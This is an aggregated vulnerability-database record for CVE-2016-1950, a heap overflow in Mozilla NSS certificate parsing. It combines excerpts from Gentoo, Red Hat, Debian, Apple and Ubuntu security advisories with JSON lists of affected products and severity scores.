http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1962 [ 126 ] CVE-2016-1963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1963 [ 127 ] CVE-2016-1963 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1963 [ 128 ] CVE-2016-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1964 [ 129 ] CVE-2016-1964 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1964 [ 130 ] CVE-2016-1965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1965 [ 131 ] CVE-2016-1965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1965 [ 132 ] CVE-2016-1966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1966 [ 133 ] CVE-2016-1966 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1966 [ 134 ] CVE-2016-1967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1967 [ 135 ] CVE-2016-1967 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1967 [ 136 ] CVE-2016-1968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1968 [ 137 ] CVE-2016-1968 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1968 [ 138 ] CVE-2016-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1969 [ 139 ] CVE-2016-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1969 [ 140 ] CVE-2016-1970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1970 [ 141 ] CVE-2016-1970 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1970 [ 142 ] CVE-2016-1971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1971 [ 143 ] CVE-2016-1971 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1971 [ 144 ] CVE-2016-1972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1972 [ 145 ] CVE-2016-1972 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1972 [ 146 ] CVE-2016-1973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1973 [ 147 ] CVE-2016-1973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1973 [ 148 ] CVE-2016-1974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1974 [ 149 ] CVE-2016-1974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1974 [ 150 ] CVE-2016-1975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1975 [ 151 ] CVE-2016-1975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1975 [ 152 ] CVE-2016-1976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1976 [ 153 ] CVE-2016-1976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1976 [ 154 ] CVE-2016-1977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1977 [ 155 ] CVE-2016-1977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1977 [ 156 ] CVE-2016-1978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1978 [ 157 ] CVE-2016-1978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1978 [ 158 ] CVE-2016-1979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1979 [ 159 ] CVE-2016-1979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1979 [ 160 ] CVE-2016-2790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2790 [ 161 ] CVE-2016-2790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2790 [ 162 ] CVE-2016-2791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2791 [ 163 ] CVE-2016-2791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2791 [ 164 ] CVE-2016-2792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2792 [ 165 ] CVE-2016-2792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2792 [ 166 ] CVE-2016-2793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2793 [ 167 ] CVE-2016-2793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2793 [ 168 ] CVE-2016-2794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2794 [ 169 ] CVE-2016-2794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2794 [ 170 ] CVE-2016-2795 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2795 [ 171 ] CVE-2016-2795 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2795 [ 172 ] CVE-2016-2796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2796 [ 173 ] CVE-2016-2796 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2796 [ 174 ] CVE-2016-2797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2797 [ 175 ] CVE-2016-2797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2797 [ 176 ] CVE-2016-2798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2798 [ 177 ] CVE-2016-2798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2798 [ 178 ] CVE-2016-2799 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2799 [ 179 ] CVE-2016-2799 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2799 [ 180 ] CVE-2016-2800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2800 [ 181 ] CVE-2016-2800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2800 [ 182 ] CVE-2016-2801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2801 [ 183 ] CVE-2016-2801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2801 [ 184 ] CVE-2016-2802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2802 [ 185 ] CVE-2016-2802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2802
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201605-06
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--Bs4bwglUWSbluQjJQQ051Q7fVoU1XxLw6 . 5 client) - i386, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: nss-util security update Advisory ID: RHSA-2016:0495-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0495.html Issue date: 2016-03-23 CVE Names: CVE-2016-1950 =====================================================================
- Summary:
Updated nss-util packages that fix one security issue are now available for Red Hat Enterprise Linux 6.2, 6.4, and 6.5 Advanced Update Support, and Red Hat Enterprise Linux 6.6 and 7.1 Extended Update Support.
Red Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.1) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1) - x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.6) - x86_64 Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server EUS (v. 7.1) - ppc64, ppc64le, s390x, x86_64
- Description:
Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications. The nss-util package provides a set of utilities for NSS and the Softoken module.
A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. (CVE-2016-1950)
Red Hat would like to thank the Mozilla project for reporting this issue. Upstream acknowledges Francis Gabriel as the original reporter.
All nss-util users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all applications linked to the nss and nss-util libraries must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1310509 - CVE-2016-1950 nss: Heap buffer overflow vulnerability in ASN1 certificate parsing (MFSA 2016-35)
- Package List:
Red Hat Enterprise Linux HPC Node EUS (v. 6.6):
Source: nss-util-3.19.1-3.el6_6.src.rpm
x86_64: nss-util-3.19.1-3.el6_6.i686.rpm nss-util-3.19.1-3.el6_6.x86_64.rpm nss-util-debuginfo-3.19.1-3.el6_6.i686.rpm nss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.6):
x86_64: nss-util-debuginfo-3.19.1-3.el6_6.i686.rpm nss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm nss-util-devel-3.19.1-3.el6_6.i686.rpm nss-util-devel-3.19.1-3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.2):
Source: nss-util-3.13.1-10.el6_2.src.rpm
x86_64: nss-util-3.13.1-10.el6_2.i686.rpm nss-util-3.13.1-10.el6_2.x86_64.rpm nss-util-debuginfo-3.13.1-10.el6_2.i686.rpm nss-util-debuginfo-3.13.1-10.el6_2.x86_64.rpm nss-util-devel-3.13.1-10.el6_2.i686.rpm nss-util-devel-3.13.1-10.el6_2.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.4):
Source: nss-util-3.14.3-8.el6_4.src.rpm
x86_64: nss-util-3.14.3-8.el6_4.i686.rpm nss-util-3.14.3-8.el6_4.x86_64.rpm nss-util-debuginfo-3.14.3-8.el6_4.i686.rpm nss-util-debuginfo-3.14.3-8.el6_4.x86_64.rpm nss-util-devel-3.14.3-8.el6_4.i686.rpm nss-util-devel-3.14.3-8.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.5):
Source: nss-util-3.16.1-4.el6_5.src.rpm
x86_64: nss-util-3.16.1-4.el6_5.i686.rpm nss-util-3.16.1-4.el6_5.x86_64.rpm nss-util-debuginfo-3.16.1-4.el6_5.i686.rpm nss-util-debuginfo-3.16.1-4.el6_5.x86_64.rpm nss-util-devel-3.16.1-4.el6_5.i686.rpm nss-util-devel-3.16.1-4.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.6):
Source: nss-util-3.19.1-3.el6_6.src.rpm
i386: nss-util-3.19.1-3.el6_6.i686.rpm nss-util-debuginfo-3.19.1-3.el6_6.i686.rpm nss-util-devel-3.19.1-3.el6_6.i686.rpm
ppc64: nss-util-3.19.1-3.el6_6.ppc.rpm nss-util-3.19.1-3.el6_6.ppc64.rpm nss-util-debuginfo-3.19.1-3.el6_6.ppc.rpm nss-util-debuginfo-3.19.1-3.el6_6.ppc64.rpm nss-util-devel-3.19.1-3.el6_6.ppc.rpm nss-util-devel-3.19.1-3.el6_6.ppc64.rpm
s390x: nss-util-3.19.1-3.el6_6.s390.rpm nss-util-3.19.1-3.el6_6.s390x.rpm nss-util-debuginfo-3.19.1-3.el6_6.s390.rpm nss-util-debuginfo-3.19.1-3.el6_6.s390x.rpm nss-util-devel-3.19.1-3.el6_6.s390.rpm nss-util-devel-3.19.1-3.el6_6.s390x.rpm
x86_64: nss-util-3.19.1-3.el6_6.i686.rpm nss-util-3.19.1-3.el6_6.x86_64.rpm nss-util-debuginfo-3.19.1-3.el6_6.i686.rpm nss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm nss-util-devel-3.19.1-3.el6_6.i686.rpm nss-util-devel-3.19.1-3.el6_6.x86_64.rpm
Red Hat Enterprise Linux ComputeNode EUS (v. 7.1):
Source: nss-util-3.19.1-5.el7_1.src.rpm
x86_64: nss-util-3.19.1-5.el7_1.i686.rpm nss-util-3.19.1-5.el7_1.x86_64.rpm nss-util-debuginfo-3.19.1-5.el7_1.i686.rpm nss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1):
x86_64: nss-util-debuginfo-3.19.1-5.el7_1.i686.rpm nss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm nss-util-devel-3.19.1-5.el7_1.i686.rpm nss-util-devel-3.19.1-5.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: nss-util-3.19.1-5.el7_1.src.rpm
ppc64: nss-util-3.19.1-5.el7_1.ppc.rpm nss-util-3.19.1-5.el7_1.ppc64.rpm nss-util-debuginfo-3.19.1-5.el7_1.ppc.rpm nss-util-debuginfo-3.19.1-5.el7_1.ppc64.rpm nss-util-devel-3.19.1-5.el7_1.ppc.rpm nss-util-devel-3.19.1-5.el7_1.ppc64.rpm
s390x: nss-util-3.19.1-5.el7_1.s390.rpm nss-util-3.19.1-5.el7_1.s390x.rpm nss-util-debuginfo-3.19.1-5.el7_1.s390.rpm nss-util-debuginfo-3.19.1-5.el7_1.s390x.rpm nss-util-devel-3.19.1-5.el7_1.s390.rpm nss-util-devel-3.19.1-5.el7_1.s390x.rpm
x86_64: nss-util-3.19.1-5.el7_1.i686.rpm nss-util-3.19.1-5.el7_1.x86_64.rpm nss-util-debuginfo-3.19.1-5.el7_1.i686.rpm nss-util-debuginfo-3.19.1-5.el7_1.x86_64.rpm nss-util-devel-3.19.1-5.el7_1.i686.rpm nss-util-devel-3.19.1-5.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: nss-util-3.19.1-5.ael7b_1.src.rpm
ppc64le: nss-util-3.19.1-5.ael7b_1.ppc64le.rpm nss-util-debuginfo-3.19.1-5.ael7b_1.ppc64le.rpm nss-util-devel-3.19.1-5.ael7b_1.ppc64le.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 1.6,
"vendor": "mozilla",
"version": "3.20.1"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 1.6,
"vendor": "mozilla",
"version": "3.20"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 1.6,
"vendor": "mozilla",
"version": "3.21"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 1.6,
"vendor": "mozilla",
"version": "3.19.2"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.1.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.3.0"
},
{
"_id": null,
"model": "firefox",
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"trust": 1.0,
"vendor": "mozilla",
"version": "38.5.0"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.0.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.2.0"
},
{
"_id": null,
"model": "iplanet web proxy server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6"
},
{
"_id": null,
"model": "tvos",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "9.1"
},
{
"_id": null,
"model": "firefox",
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"vendor": "mozilla",
"version": "38.6.0"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.4.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7"
},
{
"_id": null,
"model": "iplanet web server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.2.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.1.0"
},
{
"_id": null,
"model": "firefox",
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"trust": 1.0,
"vendor": "mozilla",
"version": "44.0.2"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.0.5"
},
{
"_id": null,
"model": "watchos",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "2.1"
},
{
"_id": null,
"model": "vm server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
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"version": "38.6.1"
},
{
"_id": null,
"model": "opensuse",
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"trust": 1.0,
"vendor": "opensuse",
"version": "13.1"
},
{
"_id": null,
"model": "firefox",
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{
"_id": null,
"model": "linux",
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{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
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"version": "38.0"
},
{
"_id": null,
"model": "iphone os",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "9.2.1"
},
{
"_id": null,
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.3"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 1.0,
"vendor": "mozilla",
"version": "38.1.1"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201603-136"
},
{
"db": "NVD",
"id": "CVE-2016-1950"
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},
"credits": {
"_id": null,
"data": "Ubuntu",
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{
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"id": "136826"
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{
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"id": "136614"
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{
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"id": "136148"
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"id": "136146"
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{
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{
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"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2016-1950",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
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"authentication": "NONE",
"author": "VULHUB",
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"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-90769",
"impactScore": 6.4,
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"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
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"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1950",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
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"author": "nvd@nist.gov",
"id": "CVE-2016-1950",
"trust": 1.0,
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{
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{
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{
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{
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"id": "CVE-2016-1950"
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},
"description": {
"_id": null,
"data": "Heap-based buffer overflow in Mozilla Network Security Services (NSS) before 3.19.2.3 and 3.20.x and 3.21.x before 3.21.1, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, allows remote attackers to execute arbitrary code via crafted ASN.1 data in an X.509 certificate. Both Mozilla Firefox and Firefox ESR are developed by the Mozilla Foundation in the United States. The following products and versions are affected: Mozilla Firefox prior to 45.0, Firefox ESR prior to 38.7 38.x, Mozilla NSS prior to 3.19.2.3, 3.20.x, 3.21.1 prior to 3.21.x. \n\nCVE-2015-4000\n\n David Adrian et al. reported that it may be feasible to attack\n Diffie-Hellman-based cipher suites in certain circumstances,\n compromising the confidentiality and integrity of data encrypted\n with Transport Layer Security (TLS). \n\nCVE-2015-7181\nCVE-2015-7182\nCVE-2016-1950\n\n Tyson Smith, David Keeler, and Francis Gabriel discovered\n heap-based buffer overflows in the ASN.1 DER parser, potentially\n leading to arbitrary code execution. \n\nCVE-2015-7575\n\n Karthikeyan Bhargavan discovered that TLS client implementation\n accepted MD5-based signatures for TLS 1.2 connections with forward\n secrecy, weakening the intended security strength of TLS\n connections. \n\nCVE-2016-1938\n\n Hanno Boeck discovered that NSS miscomputed the result of integer\n division for certain inputs. This could weaken the cryptographic\n protections provided by NSS. However, NSS implements RSA-CRT leak\n hardening, so RSA private keys are not directly disclosed by this\n issue. \n\nCVE-2016-1978\n\n Eric Rescorla discovered a user-after-free vulnerability in the\n implementation of ECDH-based TLS handshakes, with unknown\n consequences. \n\nCVE-2016-1979\n\n Tim Taubert discovered a use-after-free vulnerability in ASN.1 DER\n processing, with application-specific impact. \n\nCVE-2016-2834\n\n Tyson Smith and Jed Davis discovered unspecified memory-safety\n bugs in NSS. \n\nIn addition, the NSS library did not ignore environment variables in\nprocesses which underwent a SUID/SGID/AT_SECURE transition at process\nstart. In certain system configurations, this allowed local users to\nescalate their privileges. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:3.26-1+debu8u1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:3.23-1. \n\nWe recommend that you upgrade your nss packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-03-21-3 tvOS 9.2\n\ntvOS 9.2 is now available and addresses the following:\n\nFontParser\nAvailable for: Apple TV (4th generation)\nImpact: Opening a maliciously crafted PDF file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: Apple TV (4th generation)\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIOHIDFamily\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nKernel\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to bypass code signing\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed through improved\npermission validation. \nCVE-ID\nCVE-2016-1751 : Eric Monti of Square Mobile Security\n\nKernel\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple TV (4th generation)\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nlibxml2\nAvailable for: Apple TV (4th generation)\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1762\n\nSecurity\nAvailable for: Apple TV (4th generation)\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTrueTypeScaler\nAvailable for: Apple TV (4th generation)\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWebKit\nAvailable for: Apple TV (4th generation)\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1783 : Mihai Parparita of Google\n\nWebKit History\nAvailable for: Apple TV (4th generation)\nImpact: Processing maliciously crafted web content may lead to an\nunexpected Safari crash\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and \u674e\u666e\u541b of\n\u65e0\u58f0\u4fe1\u606f\u6280\u672fPKAV Team (PKAV.net)\n\nWi-Fi\nAvailable for: Apple TV (4th generation)\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nInstallation note:\n\nApple TV will periodically check for software updates. Alternatively,\nyou may manually check for software updates by selecting\n\"Settings -\u003e System -\u003e Software Update -\u003e Update Software.\". \n\nTo check the current version of software, select\n\"Settings -\u003e General -\u003e About\". ============================================================================\nUbuntu Security Notice USN-2917-2\nApril 07, 2016\n\nfirefox regressions\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-2917-1 introduced several regressions in Firefox. \n\nSoftware Description:\n- firefox: Mozilla Open Source web browser\n\nDetails:\n\nUSN-2917-1 fixed vulnerabilities in Firefox. This update caused several\nregressions that could result in search engine settings being lost, the\nlist of search providers appearing empty or the location bar breaking\nafter typing an invalid URL. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n Francis Gabriel discovered a buffer overflow during ASN.1 decoding in NSS. \n If a user were tricked in to opening a specially crafted website, an\n attacker could potentially exploit this to cause a denial of service via\n application crash, or execute arbitrary code with the privileges of the\n user invoking Firefox. (CVE-2016-1950)\n \n Bob Clary, Christoph Diehl, Christian Holler, Andrew McCreight, Daniel\n Holbert, Jesse Ruderman, Randell Jesup, Carsten Book, Gian-Carlo Pascutto,\n Tyson Smith, Andrea Marchesini, and Jukka Jyl=C3=A4nki discovered multiple\n memory safety issues in Firefox. If a user were tricked in to opening a\n specially crafted website, an attacker could potentially exploit these to\n cause a denial of service via application crash, or execute arbitrary code\n with the privileges of the user invoking Firefox. (CVE-2016-1952,\n CVE-2016-1953)\n \n Nicolas Golubovic discovered that CSP violation reports can be used to\n overwrite local files. If a user were tricked in to opening a specially\n crafted website with addon signing disabled and unpacked addons installed,\n an attacker could potentially exploit this to gain additional privileges. \n (CVE-2016-1954)\n \n Muneaki Nishimura discovered that CSP violation reports contained full\n paths for cross-origin iframe navigations. An attacker could potentially\n exploit this to steal confidential data. (CVE-2016-1955)\n \n Ucha Gobejishvili discovered that performing certain WebGL operations\n resulted in memory resource exhaustion with some Intel GPUs, requiring\n a reboot. If a user were tricked in to opening a specially crafted\n website, an attacker could potentially exploit this to cause a denial\n of service. (CVE-2016-1956)\n \n Jose Martinez and Romina Santillan discovered a memory leak in\n libstagefright during MPEG4 video file processing in some circumstances. \n If a user were tricked in to opening a specially crafted website, an\n attacker could potentially exploit this to cause a denial of service via\n memory exhaustion. (CVE-2016-1957)\n \n Abdulrahman Alqabandi discovered that the addressbar could be blank or\n filled with page defined content in some circumstances. If a user were\n tricked in to opening a specially crafted website, an attacker could\n potentially exploit this to conduct URL spoofing attacks. (CVE-2016-1958)\n \n Looben Yang discovered an out-of-bounds read in Service Worker Manager. If\n a user were tricked in to opening a specially crafted website, an attacker\n could potentially exploit this to cause a denial of service via\n application crash, or execute arbitrary code with the privileges of the\n user invoking Firefox. (CVE-2016-1959)\n \n A use-after-free was discovered in the HTML5 string parser. If a user were\n tricked in to opening a specially crafted website, an attacker could\n potentially exploit this to cause a denial of service via application\n crash, or execute arbitrary code with the privileges of the user invoking\n Firefox. (CVE-2016-1960)\n \n A use-after-free was discovered in the SetBody function of HTMLDocument. \n If a user were tricked in to opening a specially crafted website, an\n attacker could potentially exploit this to cause a denial of service via\n application crash, or execute arbitrary code with the privileges of the\n user invoking Firefox. (CVE-2016-1961)\n \n Dominique Haza=C3=ABl-Massieux discovered a use-after-free when using multiple\n WebRTC data channels. If a user were tricked in to opening a specially\n crafted website, an attacker could potentially exploit this to cause a\n denial of service via application crash, or execute arbitrary code with\n the privileges of the user invoking Firefox. (CVE-2016-1962)\n \n It was discovered that Firefox crashes when local files are 